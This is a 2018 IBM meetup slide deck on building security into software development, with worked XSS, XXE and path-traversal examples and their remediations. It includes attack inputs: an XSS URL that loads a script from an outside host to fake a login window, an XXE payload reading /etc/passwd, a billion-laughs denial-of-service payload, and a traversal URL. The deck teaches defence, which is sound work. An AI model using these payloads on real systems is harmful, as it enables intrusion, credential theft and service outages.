The document summarizes security best practices in software development at IBM. It discusses planning for security at each phase of development, including design, coding guidelines, testing and validation. It provides examples of common vulnerabilities like cross-site scripting (XSS) and XML external entity (XXE) attacks. Remediation steps are outlined for XSS, XXE and file path traversal vulnerabilities. The document wraps up by emphasizing security in design, training, tools usage, testing and compliance.

1. Security in the
development at IBM
Lab
Meetup March 29, 2018
Changhai KE
Product Architect and Security Lead
PhD, CISSP
changhai.ke@fr.ibm.com

2. About my organization and me
• Operational Decision Manager offerings
• Business Rules platform for modeling, governance and execution
• Decision Services, Decision Warehouse, Operational Intelligence
• On-prem, SaaS
• Product architect & security lead
• Requirements, development, testing, compliance, pre-sales, support,
etc.
• Solicits developers, team leads, offering managers
• Explain, argue, arbitrate, assess and assume some degree of the risk
• IBM France Lab
• From an ex French company
4 avril 2018 -- 2 --

3. Agenda
• General development guidelines for security
• Some vulnerability examples (in OWASP top 10)
• Wrap-up
4 avril 2018 -- 3 --

4. Security in the development
Security is in all the phases, of course!
• Planning
• Design
• Development
• Tests, validation
• Audits, certification, compliance program
• Support, Incident reporting
4 avril 2018 -- 4 --

5. Security in the development (1)
• Planning
• Awareness
• Training
• Resource & Competency
• Tools
• Audits
• Design
• Stack (Java, App Server, 3rd party jars, web frontend, etc.)
• Topology (Reverse proxy, firewall, VLAN, HA-DR, SLA)
• Authentication, authorization, SSO, SAML
• API protection: Basic Auth, Oauth, OpenID Connect, etc.
• Encryption, data privacy protection
4 avril 2018 -- 5 --

6. Security in the development (2)
• Development
• Coding guidelines: SQL queries, XML parsers, Encoder / decoder,
sanitization, etc.
• Common classes
• Tools: openssl, certificate management, developer tools, IDE plugins
• Unit tests
• Tests, validation
• Security unit and validation tests
• Scanning: static code analysis, web scanning
• Penetration tests: Tests by ethical hackers
4 avril 2018 -- 6 --

7. Security in the development (3)
• Audits
• Certification
• Compliance
• Support
• Incident Handling
• 3rd party vulnerabilities
• Own vulnerabilities
• PSIRT (Product Security Incident Response Team)
4 avril 2018 -- 7 --

8. Some common vulnerabilities
4 avril 2018 -- 8 --

9. Cross-Site Scripting (XSS)
• Severity: HIGH (if exploitable)
• CVSS: 7.0-10.0 (if exploitable)
• OWASP 2017 Top 10: A7 (Cross-Site Scripting)
• Target: End-user
• Two common types:
• Reflected XSS
• Stored (or Persistent) XSS
OWASP: Open Web Application Security Project
4 avril 2018 -- 9 --

10. XSS – Reflected
• Reflected XSS: The attacker submits JavaScript code to the application
via a URL parameter, the parameter is then attached to a hyperlink. When
a user clicks on the (malicious) link, the page is loaded and the JavaScript
is executed.
4 avril 2018 -- 10 --

11. XSS – Stored (or persistent)
• Stored XSS: The attacker submits JavaScript code to the application and
the code is stored. When a web page is loaded, the Javascript code is
executed.
4 avril 2018 -- 11 --

12. XSS Example
• Consider a web application that provides search functionality, with the
following URL:
• http://www.insecurelabs.org/Search.aspx?query=hello
• Searched string entered in a field:
4 avril 2018 -- 12 --

13. XSS Example: passing a Java script
JavaScript input strings are also accepted
http://www.insecurelabs.org/Search.aspx?query=%3Cscript%3Ealert%28%27XSS+security+alert%
27%29%3C%2Fscript%3E
(not encoded version:
http://www.insecurelabs.org/Search.aspx?query=<script>alert('XSS security alert')</script>)
4 avril 2018 -- 13 --

14. XSS Example: Javascript login page
Pass a JavaScript that pops up a login window:
http://www.insecurelabs.org/Task/Rule1?query=%3Cscript+src%3D%22h
ttp%3A%2F%2Fhck.me%2Flog.js%22%3E%3C%2Fscript%3E
Not encoded: http://www.insecurelabs.org/Task/Rule1?query= <script
src="http://hck.me/log.js"></script>
4 avril 2018 -- 14 --

15. XSS – Remediation
Two steps to prevent XSS
• Sanitize user inputs: make sure data submitted by the user fits
the application expectations.
• Encode the data before displaying it using HTMLEntities
encoding. Special characters will be encoded using the HTML
entity equivalent.
Check the OWASP cheat sheet
(https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet)
4 avril 2018 -- 15 --

16. XML XXE (XML External Entities) attack
• CVSS: 7.0 – 10.0
• Severity: HIGH
• OWASP 2017 Top 10: A4 (XML External Entities)
4 avril 2018 -- 16 --

17. XML XXE: How this works?
• Attacker submits an XML payload to an application / servlet
• XML parsing may be badly configured
• Retrieve local or remote system files
• Cause Denial of Service
4 avril 2018 -- 17 --

18. XML XXE: An example with shipment
XML payload for the shipment to an address in Paris
4 avril 2018 -- 18 --
<Shipment>
<Id>762378</Id>
<Package>Rp7845ZK</Package>
<FirstName>Paul</FirstName>
<LastName>Dupont</LastName>
<Address>
<Street>Rue de Rivoli</Street>
<City>Paris</City>
<ZIP>75001</ZIP>
<Region>Ile de France</Region>
</Address>
</Shipment>

19. XML XXE: File access using XXE
Defines a DTD with some entities. Note: XML External Entity can reference a URI or URL.
4 avril 2018 -- 19 --
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "file:///etc/passwd” >]>
<Shipment>
<Id>762378</Id>
<Package>Rp7845ZK</Package>
<FirstName>Paul</FirstName>
<LastName>&xxe;</LastName>
<Address>
<Street>Rue de Rivoli</Street>
<City>Paris</City>
<ZIP>75001</ZIP>
<Region>Ile de France</Region>
</Address>
</Shipment>

20. XML XXE: DoS with entity expansion
Defines recursive entity expansion which consumes memory (aka one billion
laughs).
4 avril 2018 -- 20 --
<?xml version="1.0”e encoding="ISO-8859-1"?>
<!DOCTYPE lolz [
<!ENTITY lol "lol">
<!ENTITY lol1 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
<!ENTITY lol2 "&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;">
<!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
<!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;">
<!ENTITY lol5 "&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;">
<!ENTITY lol6 "&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;">
<!ENTITY lol7 "&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;">
<!ENTITY lol8 "&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;">
<!ENTITY lol9 "&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;">
]>
<Shipment>
<Id>762378</Id>
<Package>Rp7845ZK</Package>
<FirstName>Paul</FirstName>
<LastName>&lol9;</LastName>
<Address>
<Street>Rue de Rivoli</Street>
<City>Paris</City>
<ZIP>75001</ZIP>
<Region>Ile de France</Region>
</Address>
</Shipment>
Java: Out of Memory Error !

21. XML XXE: Remediation
• Disable DTDs (External Entities) completely.
• Or otherwise disable ENTITY tags
• in the XML parser used by the application. Note: Often, XML parsers allow
External Entities by default.
• Use XML schema than DTDs
• Other applications use JSON
• other vulnerabilities, not the same
4 avril 2018 -- 21 --
validator.setFeature("http://xml.org/sax/features/external-general-entities", false);
validator.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
validator.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);

22. File Path Traversal – The basics…
• Severity: HIGH
• CVSS: 7.0-10.0
• OWASP 2017 Top 10: A5 (Broken Access Control)
• Target: System
4 avril 2018 -- 22 --

23. File Path Traversal
• Attacker submits a file path to the application via a parameter. The
Attacker typically uses relative paths (../../../etc/passwd) or absolute paths
(/etc/passwd) to access system files.
4 avril 2018 -- 23 --

24. File Path Traversal – An example
• File retrieval with File Path Traversal
• Consider a web application that uses URL parameters to reference
resource files, like these:
• https://www.example.com/get-files.jsp?file=report.pdf
• In this application, it’s possible to insert a malicious string as a
parameter value to access files outside the directory:
• https://www.example.com/get-files.jsp?file=/etc/passwd
4 avril 2018 -- 24 --

25. File Path Traversal – Remediation
Multiple ways to prevent File Path Traversal:
• Reference known files via an index number rather than their
name, and use application-generated filenames to save user-
supplied file content.
• Sanitize and validate user inputs – filter dot-dot (..)
sequences, for example.
• Accessible files in a specific directory or volume
• Use file system API to verify that the file to be accessed is
actually located in the base directory for the application.
4 avril 2018 -- 25 --

26. Other vulnerabilities
• Cookies: configuration, encryption etc.
• Session management
• Use of HTTPS (TLS 1.1, TLS 1.2 etc.)
• Insecure ciphers
• Certificate verification
• PII stored in clear
• Passwords (PII) not encrypted, not hashed
• API protection
4 avril 2018 -- 26 --

27. Wrap-up (1)
• Design, architecture
• Single Sign On, Reverse Proxy Server, Failover topology, LDAP
• Awareness, training
• Phishing exercise, awareness campaign, seminars
• Languages, tools
• Prog languages, developer tools, cURL, openssl,
• Shared classes, libraries
• PreparedStatement, XML parsers, HTTP client, certificate management
4 avril 2018 -- 27 --

28. Wrap-up (2)
• Security planning and testing
• Static code analysis
• Dynamic Web scanning
• Penetration testing
• Audits, Certification, Compliance
4 avril 2018 -- 28 --

29. Thank You
Merci
Grazie
Gracias
Obrigado
Danke
Japanese
English
French
Russian
GermanItalian
Spanish
Brazilian Portuguese
Arabic
TraditionalChinese
Simplified Chinese
Thai
Korean
4 avril 2018 -- 29 --